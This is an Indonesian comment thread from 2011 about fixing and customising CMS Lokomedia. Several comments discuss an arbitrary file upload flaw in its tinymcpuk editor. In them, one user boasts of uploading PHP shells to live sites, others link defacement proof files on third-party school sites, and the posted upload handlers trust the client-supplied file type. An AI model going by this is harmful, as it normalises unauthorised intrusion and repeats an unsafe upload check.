    @Harun: lupa nyampein, kalau ganti folder tinymcpuk, maka gambar2 yang sudah terlanjur terupload di databse, ganti juga dengan nama yang sama di databasenya utk link img src nya (link gamabarnya)


    selamat berkarya

  • adhiatma | 05 April 2011 - 10:02:16 WIB

    pak,, searching nya kok bisa panjang gag pak dan di bisa di paging gag ??

  • Juna | 05 April 2011 - 11:46:20 WIB

    Not Found

    The requested URL /lokomedia/home was not found on this server.

    Apa maksudnya ni???? ~_~ Home nya kok gak ada.. :(

  • harun | 05 April 2011 - 18:02:19 WIB

    mas husada: maksud saya itu tool tinypuck yang di tampil halaman admin pada ilang semua kalau diganti foldernya, gmana tuh?

    kalau ada setting lainnya dimananya??

  • Husada | 05 April 2011 - 19:36:55 WIB

    @Harun: gini: di adminweb: klik gambarnya yg hilang (hanya keliatan kotak aja, ya kan? pakai browser firefox ya) lalu klik icon gambar pohon (utk insert/edit images)
    nanti akan muncul images url (contoh spt ini):
    http://www.kbiharofahmalang.com/tinymcpuk/gambar/I mage/sholat/tayamum1.jpg

    tulisan tinymcpuk (itu folder yg belum diganti) pada link tersebut ganti dengan nama yang sama dengan nama folder tinymcpuk yang baru/ yang kamu ganti? paham kan?
    lakukan yang sama utk semua gambar yang gak muncul, jangan kan di adminweb, dihalaman website pun gambar itupun gak muncul karena ada perubahan folder tinymcpuk....

  • harun | 05 April 2011 - 22:52:29 WIB

    mas husada coba deh lihat hasilnya kalau di ganti nama foldenya nih screen shootnya..

    http://i1206.photobucket.com/albums/bb458 /google58/inihasilnyakalaudigantinamafoldernya.jpg

    disitu isi /bekas tinymcpknya tak tersisa..gmana nih tapi kalau dibalikin lagi ada semua

  • harun | 05 April 2011 - 22:57:54 WIB

    jika ga bisa kebuka gambarnya coba link ini mas husada

    http://s1206.photobucket.com/albums/bb458/goo gle58/?action=view&current=inihasilnyakalaudigantinama foldernya.jpg

  • husada | 06 April 2011 - 08:15:56 WIB

    @harun: udah dilakukan edit url imagesny spt langkah2 diatas blm? Jgn lupa diklik update ya? Lakukan aja dulu? Punyaku gak masalah, kog? Klo msh bingung kembalikan aja spt. Insyaallah, aman

  • Husada | 06 April 2011 - 08:30:38 WIB

    @Harun: kalo aku liat website Mu, bagus gitu lho? bisa bikin website kayak gitu paling tidak punya skill programer, pasti lebih paham jika ganti folder tinymcpuk, jg ganti images url nya caranya ya di textarea di adminweb. soalnya file2 gambar yng diupload dg tnymcpuk di taruk di folder gambar, kalao msh bingung kembalikan aja seperti semula. insya Allah tinymcpuk msh aman.

  • hamba Allah | 07 April 2011 - 14:13:34 WIB

    pak lukman upload header yang png nya juga donk....

  • jimmy | 08 April 2011 - 20:43:13 WIB

    mas lukman, kyanya perlu sekali dc mas membuat toturial cara membuat modul di cms lokomedia, sehingga kami bisa ikut mengembangkan

    Mudahan ditanggapi

  • Fatik Wijaya | 09 April 2011 - 22:36:15 WIB

    Maaf, pertanyaan ini agak menyimpang...
    Saya pingin memasukkan coment box FB ke web per konten berita.
    Bagaimana caranya? saya coba bisanya semua konten sama.
    Saya sudah masukkan per berita juga muncul di berita yang lain..
    Mohon kalau ada yang bisa, suwun...

  • Wiro | 10 April 2011 - 21:21:00 WIB

    tinymcpuk buat entry data masih punya BUG....
    Coba datanya dientry ga diputus putus...Misalnya huruf : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...dst

    Sreen Shootya : http://i53.tinypic.com/33lnfx1.png

  • Ade | 13 April 2011 - 16:57:38 WIB

    saya mau tanya kepada para master. gimana ya caranya agar berita terkait bisa muncul. gini... misal saya update berita a dengan kategori dan tag a, kemudian saya update lagi berita b dengan kategori a dan tag a, nah masalahnya sekarang, kita liat pada postingan a, dibagian berita terkait, tidak muncul, tetapi untuk berita b muncul berita terkaitnya.

    Dari permasalahan ini, bagaimana caranya agar berita a bisa muncul postingan terkaitnya??? makasih atas jawabannya

  • Husada | 13 April 2011 - 18:35:12 WIB

    @ALL: aku ada update utk CMS LOKOMEDIA buat inspirasi update websitenya masing2:
    1. untuk file dina_title.php selama ini hanya bisa menampilkan judul dari berita, akan lebih cantik kalau juga menampilkan kategori beritanya dan juga kaitannya dg SEO
    2. file breadcumb.php selama ini hanya menampilkan modul berita dan kategorinya saja, untuk modul-modul lain tidak muncul, misalnya: hasil pencarian berita, hubungi kami, halaman statis dll, breadcumbnya gak muncul.
    3 untuk statistik website akan lebih cantik jika kita beri format number jadi untuk angka ribuan bisa tampil tanda titik nya misal: 33.333 kan cantik?

  • Husada | 13 April 2011 - 18:37:14 WIB

    Lanjutan:
    nah kejadiannya seperti ini dech ada lanjutannya :
    4. selama ini untuk komentar berita jika pengunjung mengetikkan kalimat yang panjang maka ada validasi nya untuk mengurangi kalimatnya, nah akan lebih cantik kalau kita berikan ajax misalnya: sekian karakter yang tersisa jadi jika pengunjung mengetikkan karakter di form komentar berita, maka batas karakter yg bisa diposting akan berkurang?
    bingung ya???? review aja website ku www.kbiharofahmalang.com

  • Taufik | 14 April 2011 - 00:00:07 WIB

    @pak husada : ada gak pak sourcenya untuk shoutbox yang memakai jumlah karakter itu...

  • mizan | 14 April 2011 - 10:11:45 WIB

    mas ini updatenya kok banyak noticenya ya :) apa karena saya pake PHP 5? ex $_SESSION[time_out] harusnya $_SESSION['time_out']

  • nuris akbar | 14 April 2011 - 14:53:21 WIB

    ketika saya coba kenapa halaman utamanya g muncul y?
    server eror gitu tampilanya.tapi halaman adminya jalan

  • Ade | 14 April 2011 - 17:50:11 WIB

    @Mas Husada: wah iya mas husada, sepertinya itu aku perlu!! hmm gimana caranya??

    Free backlink >>http://www.onteljawa.bacain.info/halaman-konfirmasi .html

  • husada | 14 April 2011 - 21:18:24 WIB

    @taufik n ade: itu pake ajax, caranya dibahas di buku terbaru mas lukman ttg ajax dg jquery

  • Ismail Midi | 14 April 2011 - 22:44:46 WIB

    Thanks Mr. Lukman. Saya memang belum coba yang terbaru sebab saat comment nih, sedang proses download. Tapi yg kemarin-kemarin, komentar muncul sembarangan. Misalnya, pengunjung berkomentar pada judul A, tetapi komentar bisa juga muncul di judul B, C dst.

  • ade | 15 April 2011 - 14:16:21 WIB

    ouw.. dibuku ajax dengan jquery, belum baca semuanya, oke deh mas husada... thanks...


    oh ya sekedar informasi, bagi yang punya blog/web bisa menatukan linknya dimari www.onteljawa.co.cc/halaman-backlink.html

  • septiawan | 15 April 2011 - 15:22:37 WIB

    wah dah lama g liat cms lokomedia,ternyata perkembangannya sudah jauh...
    mantab gan

  • v4lc0m87 | 15 April 2011 - 16:55:09 WIB

    coba di cek pemakai lokomedia
    contoh dari eidelweiss
    1. http://www.smkn1gedangan-malang.sch.id/warning.txt
    2. http://www.stmik-bandung.ac.id/warning.txt

  • randy | 15 April 2011 - 17:06:00 WIB

    wuih ada v4lc0m87 (webmaster pilkada)
    gimana project pilkada nya om.. success ?

    Qe³

  • randy | 15 April 2011 - 17:16:12 WIB

    oia ini sedikit tambahan..
    saya juga menemukan ini

    http://www.amiki.ac.id/warning.txt

    saya kira ini pembuktian dari kk eidelweiss atas advisories nya atau vulberability yg di jelaskan beliau di atas

  • Husada | 15 April 2011 - 22:02:10 WIB

    @ ALL: ada yang perlu aku share tentang masalah Arbitary file upload vulnerability tinymcpuk yg dishare edelweis: (btw thanx to edelweis atas infonya). ikut2 Mas Lukman nih hehehe..
    SOLUSI UTK MASALAH TSB:
    1. Rename folder tinymcpuk dengan nama lain seperti halnya folder adminweb (ANDA sendiri yang tau tentunya? RHS lah)
    2. edit/ update file media.php di adminwebnya dimana dibagian utk load javascript tinymcpuknya
    <head>
    <script language="javascript" type="text/javascript" src="../tinymcpuk/tiny_mce_gzip.js"></scrip t>
    ......
    <script language="javascript" type="text/javascript" src="../tinymcpuk/tiny_mce_src.js"></script >
    ......
    </head>
    ganti nama path utk folder tinymcpuk dengan nama folder tinymcpuk yang telah di-rename (nama yg baru). kalau gak diganti di textarea adminwebnya ya gak muncul ???

  • Husada | 15 April 2011 - 22:03:00 WIB

    LANJUTAN:
    3. untuk berita-berita yang telah diposting dgn menggunakan tinymcpuk (untuk upload gambar) harus diedit pula images urlnya caranya:
    di textarea ada icon gambar pohon (insert/ edit images) silahkan update images urlnya sesuai dengan nama folder tinymcpuk yang baru?? spy gambarnya muncul gichu!

    Hal tsb diatas juga perlu dilakukan utk TOKO online LOKOMEDIA nya

  • eidelweiss | 16 April 2011 - 19:49:41 WIB

    UPDATE !!!

    Security info terbaru saya dapat kan dari salah seorang teman saya dan setelah saya analysis ternyata terbukti dan level nya high..

    vuln terletak pada tidak ada nya validasi untuk sesion admin sehingga memungkinkan anonymous untuk melakukan penetrasi (file images yg di upload jg ternyata bisa di bypass)

  • jojo | 16 April 2011 - 20:38:54 WIB

    mas eidelwiss
    walah -walah opo meneh iki???? baru satu selesai wes ono meneh...piye ngakaline??

    all: sesepuh dll gmana nih???

  • dido | 16 April 2011 - 21:54:24 WIB

    to all: UPDATE! SAYA TELAH MENEMUKAN ADA ORANG2 YG MENCARI2 KELEMAHAN CMS LOKOMEDIA DAN MENGEXPLOITNYA UTK KEPENTINGAN PRIBADI, TANPA MEMBERI SOLUSINYA. BTW THANX BUAT TEMEN2 YG TELAH SHARING UTK PENGEMBANGAN CMS LOKOMEDIA, SMOGA ILMUNYA BERMANFAAT.. MSH NEWBIE NIH

  • ronal | 16 April 2011 - 22:25:57 WIB

    dido@ gw setuju dgn argumen anda terus berkarya cms lokomedia...........

  • ifan | 17 April 2011 - 12:24:51 WIB

    nah trus solusi untuk yang barusan dikasi tau mas eidelwiss apa???
    cara penanganannya gmana???

    soal security gelapaq kalau bisa uda ku share pasti, itung2 amal jariah ngalir trus pahalanya

  • Nuris Akbar | 17 April 2011 - 16:48:10 WIB

    ketika saya coba yang muncul malah server eror gitu.tapi pada halaman adminya berjalan dengan baik.mohon penjelasanya.
    terima kasih ...

  • hendra | 18 April 2011 - 01:00:36 WIB

    lama tak mengunjungi rumah(forum lokomedia) selalu nitip absen, malem ini hadir xixixix

    oh ya nih ada sedikit costum template dan web hasil karya ku silahkan direviuw

    http://tokoaslionline.com
    http://agustia rt.co.cc
    http:// masihdirahasikn.com

    oh ya maslah security saya sarankan bagi yang bisa cobalah untuk share ilmu itu berguna jika disebarkan...

  • Mr.KOmp | 18 April 2011 - 15:08:58 WIB

    top markotop, 1 ilmu diberikan 1000 ilmu dia dapatkan...semoga semakin berkembang

  • EKO SUHARTONO | 18 April 2011 - 18:41:52 WIB

    mas, mungkin bisa diserta'kan file mentah header lokomedianya agar kita bisa mudah modifikasi juga headernya

  • semmy | 19 April 2011 - 06:13:45 WIB

    Mas Lukman, untuk update 1.5 ini slalu muncul Fatal error: Call to undefined function imagecreatefromjpeg() in C:\...\config\fungsi_thumb.php on line 12. saat tambahkan gambar utk headline. kira2 apa? Mohon pencerahannya..

  • cauza | 19 April 2011 - 09:48:07 WIB

    Baru nyoba updete 1.4 udah muncul yang 1.5... he he he terusin mas...

  • Donni | 19 April 2011 - 22:26:47 WIB

    ada yang dah bikin uptade nggak :
    Kalo kita login di administrator kita dapat mengetahui ada user lain yang login
    Berapa yang online n kl dapat kita mengetahui sapa aja yg login

  • blabkcheck | 19 April 2011 - 23:59:03 WIB

    mantab buat CMS nya...ada yg buat logistics n courier ga pa...

  • nocual | 20 April 2011 - 10:24:15 WIB

    kok saya ada error ya di rss.php

    === CODE ERROR ===

    Warning: fopen(rss.xml) [function.fopen]: failed to open stream: Permission denied in /home/ikadiba3/public_html/lokomedia/rss.php on line 6

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/ikadiba3/public_html/lokomedia/rss.php on line 14

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/ikadiba3/public_html/lokomedia/rss.php on line 25

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/ikadiba3/public_html/lokomedia/rss.php on line 25

  • nocual | 20 April 2011 - 10:24:34 WIB

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/ikadiba3/public_html/lokomedia/rss.php on line 25

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/ikadiba3/public_html/lokomedia/rss.php on line 25

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/ikadiba3/public_html/lokomedia/rss.php on line 25

    Warning: fwrite(): supplied argument is not a valid stream resource in /home/ikadiba3/public_html/lokomedia/rss.php on line 28

    Warning: fclose(): supplied argument is not a valid stream resource in /home/ikadiba3/public_html/lokomedia/rss.php on line 29

    Warning: Cannot modify header information - headers already sent by (output started at /home/ikadiba3/public_html/lokomedia/rss.php:6) in /home/ikadiba3/public_html/lokomedia/index.php on line 3

    === END ===

  • nocual | 20 April 2011 - 21:05:22 WIB

    masalah di atas udah selesai, ternyata chmodenya.

    oya, kok manajemen modul ga bisa, padahal di adminnya udah di edit biar ga aktif. kenapa tuh?

  • eidelweiss | 22 April 2011 - 03:47:29 WIB

    @all: gak usah khawatir... web web yg memakai lokomedia cms yg nge bug gak saia rusak or tidak saya backdoor kok.... malah lgsg saya patch begitu saya upload php shell lgsg saya patch (semua site yg berhasil saya exploit)... ini nunggu mas lukman gak tau ngontact nya gmn buat private talk Qe³

  • eidelweiss | 22 April 2011 - 03:53:47 WIB

    @mas hendra: http://tokoaslionline.com <= pakai msql versi 5.0.91-community-log yach..

    Qe³

  • hendra | 22 April 2011 - 21:15:28 WIB

    kenapa mas eidelwiss??? ada apa gerangan

  • ache | 23 April 2011 - 04:31:04 WIB

    CMS yg bagus...saya newbie dlm hal CMS pengin tau lbh banyak mengenai CMS lokomedia..klo untuk membuat bs tracking n menampilkan status pengiriman gmn caranya yah mas..

  • lukman | 23 April 2011 - 12:32:12 WIB

    @ eidelweiss: kontak saya via email aja di algosigma@gmail.com, terimakasih telah memberitahukan bug security pada CMS Lokomedia, terus terang sampai saat ini saya belum menemukan solusi untuk menutup celah security tersebut, kalau eidelweiss mau berbaik hati share ilmunya, tentu sangat berarti bagi saya dan pengguna CMS Lokomedia, dan juga untuk disertakan pada update berikutnya.

  • hardi | 23 April 2011 - 20:58:34 WIB

    @eidelwes @lukman... klo yang ini harus segera dipatch segera mas... gak perlu nunggu update berikutnya

    sekedar usul saja

  • yulley | 25 April 2011 - 07:03:05 WIB

    @mas kiwil : bisa dikasih script media.php yang sudah di ganti dengan ckeditor? thanks sebelumnya.

  • hanils | 25 April 2011 - 11:06:01 WIB

    mas lukman dkk.

    sekalian donk ane minta tutorial tata cara biar bisa ONLINE-nin
    CMS lokomedia..

    TQ ^^

  • wawan | 25 April 2011 - 12:42:05 WIB

    lumayan belajar dikit dikit, meski rada pusing maklum belum pernah belajar gini ginian :)

  • Karnadi Al Hanafi | 25 April 2011 - 14:14:03 WIB

    Matur thank's you Gan atas cms nya coba ane coba ya..... lihat demonya sih kerennnnn abissss

  • eidelweiss | 27 April 2011 - 16:27:17 WIB

    @mas lukman: check email

  • lukman | 28 April 2011 - 07:29:16 WIB

    @eidelweiss: thanx a lot, segera ke TKP.

  • trbgt | 28 April 2011 - 12:18:55 WIB

    brt

  • nurfanni | 30 April 2011 - 08:30:19 WIB

    tentang masalh paging..setelah lewat 10 komentar..

    (sebelum ada paging )
    http://localhost/lokomedia-1.5/berita-78-cristiano-ron aldo-pemain-sepakbola-terbaik-2008.html

    (setelah ada paging ke halaman 2)
    http://localhost/lokomedia-1.5/halkomentar-78-cristia no-ronaldo-pemain-sepakbola-terbaik-2008-2.html


    n.....dan mohon tentang penjelasan nya???trim

  • frans dwi oktareza | 30 April 2011 - 19:00:10 WIB

    salam...
    numpang nanya ne...
    saya newbie mau pake cms lokomedia..... ne saya download tp kok nggak bisa dpake ya???
    EROR tuh....

    mohon bantuannya ya....:)

  • frans dwi oktareza | 30 April 2011 - 19:02:28 WIB

    salam...
    numpang nanya ne...
    saya newbie mau pake cms lokomedia..... ne saya download tp kok nggak bisa dpake ya???
    EROR tuh....

    mohon bantuannya ya....:)

    e-mail me (fransitf210@gmail.com0

  • putra | 30 April 2011 - 20:24:55 WIB

    Qfrans dwi oktareza error apa maksudnya mas ?

    bisa dijelaskan lebih detail lagi

  • f.d. oktareza | 05 Mei 2011 - 15:26:46 WIB

    oya... bingung ngatur mod_rewrite pada server Apache... tolong bantuannya ya....

  • f.d oktareza | 06 Mei 2011 - 08:53:43 WIB

    hm... Mohon bantuannya... Saya kebingungan dalam hal pengaturan di mod_rewrite pada apachenya... Tolong penjelasannya...
    Editnya pake apa n gmana editnya... Pada bagian mana juga yg harus d rubah agar cms lokomedia bisa d jalankan pake XAMP... Tolong ya mas....
    klo bisa tutorialnya di kirim ke email saya... Fransitf210@gmail.com

    thankz b4....:)

    Maju trus cms lokomedia....:)

  • Frank | 06 Mei 2011 - 14:51:17 WIB

    Teman2 cms lokomedia, minta bantuan master2 nih.. Database sy menggunakan firebird. dan ingin sy terapkan ke cms lokomedia. Adakah yg tau untuk koneksinya firebird ke php? Thanks sebelumnya.

  • nomor1001 | 07 Mei 2011 - 21:34:31 WIB

    pada direktori mod_berita file berita trdapat salah kode pada name type radio, biasaya name=headline smua tapi slah satununya name=publish.

  • nanda | 10 Mei 2011 - 22:53:25 WIB

    wah, webku dah jebol nih. @mas lukman, @edeweis: patchnya ndak dishare disini apa?
    masak musti nunggu sampe versi terbaru muncul????

  • bijakas | 17 Mei 2011 - 12:17:44 WIB

    Daftar komentarnya dipaging dong mas :)

  • BAYU | 20 Mei 2011 - 13:32:45 WIB

    Pak Lukman,kok ngk udate2 padahal udh banyak yang sare ke pak lukam,.lama lama bisa pada baur ni pelanganya,..
    tokobuku udh ada yang sare juga to sama template lokomedia maslah security,...Ane udah buka hampir tiap hari blm juga di update2,..
    Pada bosen lama ni,..
    ane bilang gni banyak yang ngasih ktitikan dari temen2,...
    syr pak kalo ada yang salah,..
    ane cuman ngasih masukan ja,..
    biar pelanganya gak pada kabur ATAU BOSEEEEENNNNNNNN,.....

  • Jay | 20 Mei 2011 - 15:58:57 WIB

    Teman2 CMS lokomedia, mau nanya neh, saya kepengen ganti FeaturedSlider berita yg di ElJquery2 ke elJquery, tp bingung gmana cara gantinya. Udh coba tp ko gagal mulu.. Apanya yg diganti ya? Karena saya lebih suka dgn tampilan ElJquery. Ada yg bisa bantu gak? Kalo gak keberatan dan mau bantu, ini alamat email saya: sinotabun[at]gmail[dot]com
    Thanks ya

  • zainul | 26 Mei 2011 - 16:27:06 WIB

    Please bantuanya Mas saya sudah beli buku bikin-website-super-keren-dengan-php-dan-jquery koq contoh project di cd tutorial file home nya gak ada ya..
    mohon dikirim ke email saya.. sdintegral@yahoo.com
    terima kasih

  • suryana | 28 Mei 2011 - 07:55:27 WIB

    mas para pendekar php mau nanya untuk cms ini di menu kategori agar bisa seperti cms lokomedia yang dulu gimana ya. Contoh : di cms sekarang ketika menambahkan modul tidak muncul di menu kiri kalau dulu muncul. dan yang sekarang itu benar benar per kategori. inginnya yang hanya untuk satu saja

  • tes | 03 Juni 2011 - 01:55:49 WIB

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/lokomedi/public_html/kiri.php on line 51

  • Jayen | 04 Juni 2011 - 00:16:40 WIB

    Halo semuanya, mau nanya, kalo misalnya saya mau nambahin di modul agenda biar ada gambarnya gmana caranya? Jadi saat saya klik Agenda, biar bisa ada gambarnya juga. Udh coba tapi gak bisa muncul. Mohon bantuannya..Makasih ya

  • kiwil 4 kiwil studio | 05 Juni 2011 - 10:26:15 WIB

    @ Jayen :
    bisa minta screenshot webnya, code agenda dan folder image utk agendanya.

    terima kasih ^_^

    http://www.kiwilstudio.com

  • Jayen | 05 Juni 2011 - 22:54:12 WIB

    #Mas Kiwil: Thx tanggapannya.
    Gini mas, saya tetap pake contoh di CMS Lokomedia eljquery. Nah saat kita klik Agenda, kan muncul content agenda:
    Isi Agenda:
    Tanggal:
    Pukul :
    Tempat:
    Oleh:
    Nah maunya trus dibawahnya itu saya cantumin gambar dari tempat diadakan acara tsb. Nah kira2 script apa yg harus saya tambahkan utk halaman pengunjung dan admin. Makasih sebelumnya mas.

  • mas pardi | 06 Juni 2011 - 12:50:55 WIB

    tlg bwt smua yg baik hati..

    pada file aksi_berikut

    // Input guru
    if ($module=='guru' AND $act=='input'){
    $lokasi_file = $_FILES['fupload']['tmp_name'];
    $nama_file = $_FILES['fupload']['name'];
    $tipe_file = $_FILES['fupload']['type'];
    $acak = rand(000000,999999);
    $nama_file_unik = $acak.$nama_file;

    $guru_seo = seo_title($_POST['jdl_guru']); // ini yang bermasalah bg gus



    apa maksud seo_gallery

  • anca | 08 Juni 2011 - 19:03:06 WIB

    assalamu alaikum,,,
    wahhh saya sangadhh kagum dgn buku mas lukman
    sblumnya mohon maaf mas,,,,

    kbtulan saya sudah update cms lokomedia 1.5 dsitu katanya u/ post komentarnya udah baik tapi pd saat saya pake k0' masih err0rr ya mas,,
    dgn pesan sperti ini :
    "Not Found

    The requested URL /berita-131.html was not found on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request."
    trusss dibagian bug .htaccess yg perlu di perbaiki yg mana mas,,,,???

    sblumnya makasih tas bantuannya

  • opik | 12 Juni 2011 - 17:21:32 WIB

    sore mas lukman, mas husada, mas henry, semua mastah2 coding pecinta lokomedia.

    tolongin aq dong, ada masalah pas upload ke hosting. dilocalhost gada masalh.

    saya sudah bikin database dan arahin config ke database tersebut.

    tapi koq muncul dibrowser
    404 Not Found

    The requested URL /home was not found on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

    padahal didomainya udah keluar, bisa dicek.
    w3. islamic13.com/home

    tolong bantuannya mastah..
    ane udah cek, apa ada settingan yang salah?

    .htaccess nya?

    terima kasih atas pencerahannya.:)
    maju terus lokomedia, maju terus programmer indonesia.

  • reza | 12 Juni 2011 - 22:56:58 WIB

    mas ini saya baru beli buku mas, saya masih bingung ,, ini cms ato bkn y? nah kan saya pake mysql nih,,apa aja yang harus d rubah mas.. ty~
    nb : maaf kalo pertanyaannya gak bermutu

  • reza | 12 Juni 2011 - 22:59:37 WIB

    maaf mas maksud saya saya pakai xampp 1.6

  • masluq | 13 Juni 2011 - 16:11:04 WIB

    tanya : gimana munculin path pada Tambah Halaman Statis. Path yang diperlukan untuk mengetahui alamat/link tidak muncul, mohon saran dan jawabanya

  • sebar iklan gratis | 15 Juni 2011 - 12:39:48 WIB

    Maaf nih, masih newbie jadi bingung. CMS lokomedia itu apa yah? Semacam wordpress gitu yah?

  • syawal | 19 Juni 2011 - 15:39:19 WIB

    Pak Lukman.atau siapa aja yang bisa bantu.
    buku kirimannya bagus dan sudah dibaca dan dipelajari cuma saya masih belum mengerti bagaimana cara menampilkan berita berdasarkan kategori yang kita pilih disertai gambar berita per-kategori. serta ditambah ditampilkan juga 5 berita berikutnya dari kategori pilihan kita tersebut.
    terima kasih sebelumnya atas bantuan pak Lukman dan sobat lainnya untuk menjawab pertanyaan saya.

  • Simri | 20 Juni 2011 - 15:28:49 WIB

    Mohon pencerahan teman2 ya
    Kenapa stiap saya upload gambar utk image_album (msh di localhost) selalu muncul gini:
    Upload gagal, pastikan file yg diupload bertipe JPG, pdhl udh JPG, trus size juga 20kb?
    Trus perintah errornya gini:
    Undefined variable: tipe_file: C:\xampp\htdocs\lokomedia\adminweb\modul\mod_album\a ksi_album.php on line 27
    Undefined variable: tipe_file: C:\xampp\htdocs\lokomedia\adminweb\modul\mod_album\a ksi_album.php on line 27
    Pdhl saya belum rubah apa2 dari script tsb
    Mod rewrite sudah aktif juga.
    Apa itu krna virus, karena beberapa hari lalu kompi saya kena virus
    Thnx sebelumnya

  • adi | 24 Juni 2011 - 00:04:39 WIB

    waduh, masak nih web homenya kek gini
    CMS masih ada bug, silahkan di benahi (brapit_inpisible -> devilzc0de).

    bugs nya nyang mana

  • lukman | 24 Juni 2011 - 10:43:16 WIB

    maaf, saya juga belum nemu bugnya dimana? semoga devilzc0de mau berbaik hati memberitahu bugnya.

  • Simri | 24 Juni 2011 - 11:24:13 WIB

    Bagaimana caranya mengatur hak akses untuk user-user yg lain.
    Misalnya gini: Pada manajemen user, saya sbgai admin menambahkan 1 user baru bernama
    gendang dan pasword = gendang dan dia hanya khusus untuk menambahkan berita saja.
    Apa itu bisa dilakukan saat msh di localhost atau harus setelah online?
    Karena saya coba di localhost dan coba login dgn user gendang dan pswd = gendang tetap gak bisa
    Kalo misal harus login dgn admin, berarti apa sesungguhnya fungsi dari user-user yg
    ditambahkan oleh administrator?

    -Trus kalo shoutbox utk minichat itu memang gak ditampilin di lokomedia ya? Gmana cara
    nampilinnya ya?
    Mohon informasi dari teman2 semuanya.
    Thx

  • coba_jawab | 24 Juni 2011 - 11:53:07 WIB

    @Simri : user 'biasa' bisa input berita baik saat di localhost maupun Online kok... (coba lagi dech)
    Soutbox Minichat Kalo di Template ElJQuery memang belum ditampilkan => Coba Ganti Template Standar (Muncul Kan...)
    Kalo mau ditambahkan di Template ElJQuey Juga bisa kok, (buka folder Templates/ElJQuery/templates.php => tinggal dioprek2 dikit )

  • bayu | 26 Juni 2011 - 15:12:20 WIB

    kok modul album itu muncul notif terus waktu mau ganti images album padahal file tipenya udag bener jgp

  • Abdul Aziz | 26 Juni 2011 - 19:58:22 WIB

    teman-teman, sy minta reviewnya neh. template buatan sy, asyik loh (;

  • Massol | 27 Juni 2011 - 11:28:56 WIB

    keren mas. sangat membantu tuk belajara saya.
    matur suwun

  • Simri | 27 Juni 2011 - 15:49:10 WIB

    #Coba jawab: Ok, thnx ya. Akan saya coba lagi ya.
    Bravo

  • Roy | 28 Juni 2011 - 02:55:44 WIB

    @Bang Kiwil: Kalo saya mau kasiin captcha ke mini chat (shout box) tu gmana caranya? Boleh share gak? Kayak di website kiwilstudio itu. Ato teman lain yg tau boleh share gak?
    Thx sebelumnya

  • aziz | 28 Juni 2011 - 12:54:41 WIB

    @Roy:
    download ini!
    http://www.madinatunnajah.sch.id/downlot.php?file=pesan mini.zip

    ;)

  • ekp | 29 Juni 2011 - 02:54:27 WIB

    kenapa begini
    http://error404.000webhost.com/?

    apasalah saya, erornya begituan kawan..ada yyg mau tolongin?

  • Aziz | 29 Juni 2011 - 12:02:53 WIB

    setahu sy, 000webhost tdk mau menerima tag
    <iframe></iframe>

  • ge-book.com | 29 Juni 2011 - 15:08:22 WIB

    Thanks For Pak Lukman, ternyata template CMSnya SEO Friendly dan terbukti dengan mudah mendapatkan PR.

  • comex | 29 Juni 2011 - 21:17:37 WIB

    template lokomedia minimalis,
    ni screen shot'nya http://grahaweb.net/templates_minimalis.jpg
    Download http://grahaweb.net/grahaweb.zip

  • A Junaidi | 30 Juni 2011 - 11:02:12 WIB

    Bagus, oke punya, makasih, buku terbitannya tetap di tunggu, membuat jadi mudah mengerti
    Plus info dari webnya.
    Terima kasih

  • budi | 30 Juni 2011 - 11:36:07 WIB

    mantaps pak lukman cms yang 1.5, tinggal tunggu bukunya nih.......trims

  • joni | 30 Juni 2011 - 13:53:07 WIB

    gimana cara buat url seperti ini

    www.contoh.com/read/2011/04/20/134739/1621815/31 9/ini-hanya-contoh

    terimakash

  • Roy | 01 Juli 2011 - 15:09:25 WIB

    #Aziz: Ko gak bisa didownload ya?

  • aziz | 01 Juli 2011 - 16:30:44 WIB

    link diatas dipotong oleh csript lokomedia karena kepanjangan. buka aja www.madinatunnajah.sch.id
    dibawah ada menu unduhan

  • Bayu | 01 Juli 2011 - 22:31:37 WIB

    @mas aziz : boleh minta modul album? cos punyaku rusak dan gak tau bagian mana yang salah, waktu upload untuk gambar foto album selalu menampilkan error harus foto format JPG padahal foto yang aku upload jpg, bisa kasih saran?

  • aziz | 01 Juli 2011 - 23:21:36 WIB

    @MAS BAYU: file fungsi_thumb.php masih ada gak di folder config.
    yg error diprosesnya mas, sedangkan file yang memproses adlh fungsi_thumb.php di folder config. copykan saja yg baru dari cms lokomedianya.

  • Roy | 02 Juli 2011 - 01:42:23 WIB

    Thank's bung Aziz. Saya sudah dload dari web abang. Ngomong2 ko bisa miring gitu template websitenya? Jd penesaran... Mantap... bisa jd referensi nih...

  • Simri | 02 Juli 2011 - 02:12:48 WIB

    Itu msh pake yg template elJquery (yg pertama) ya? Kalo iya, itu emang masih error,
    tp sdh diperbaiki di elJquery2. Jd kl misal msh pake yg elJquery pertama,
    buka file di admin/modul/mod_album/aksi_album.php
    trus cari Bgn ini(sekitar line 16/17)
    // Input album
    if ($module=='album' AND $act=='input'){
    $lokasi_file = $_FILES['fupload']['tmp_name'];
    $nama_file = $_FILES['fupload']['name'];
    $acak = rand(000000,999999);
    $nama_file_unik = $acak.$nama_file;

    nah ente sisipkan ini: $tipe_file = $_FILES['fupload']['type']; sehingga sprti ini:
    if ($module=='album' AND $act=='input'){
    $lokasi_file = $_FILES['fupload']['tmp_name'];
    $nama_file = $_FILES['fupload']['name'];
    $tipe_file = $_FILES['fupload']['type'];
    $acak = rand(000000,999999);
    $nama_file_unik = $acak.$nama_file;

  • Simri | 02 Juli 2011 - 02:15:26 WIB

    Lanjutan buat Mas Bayu: Sorry diatas lupa namanya nanti malah Bayu bingung... Ok lanjutannya:

    trus ke line ini (line 52) sisipkan juga $tipe_file = $_FILES['fupload']['type'];
    Biar seperti ini juga
    //Update album
    elseif ($module=='album' AND $act=='update'){
    $lokasi_file = $_FILES['fupload']['tmp_name'];
    $nama_file = $_FILES['fupload']['name'];
    $tipe_file = $_FILES['fupload']['type'];
    $acak = rand(000000,999999);
    $nama_file_unik = $acak.$nama_file;

    Semoga bisa membantu bro.

  • Krisnapati Bayu | 02 Juli 2011 - 12:37:23 WIB

    @mas aziz : thanks ya mas :D
    @mas simri : segera akan saya sisipkan scriptnya :D thanks ya mas ^_^

  • Krisnapati Bayu | 02 Juli 2011 - 12:59:37 WIB

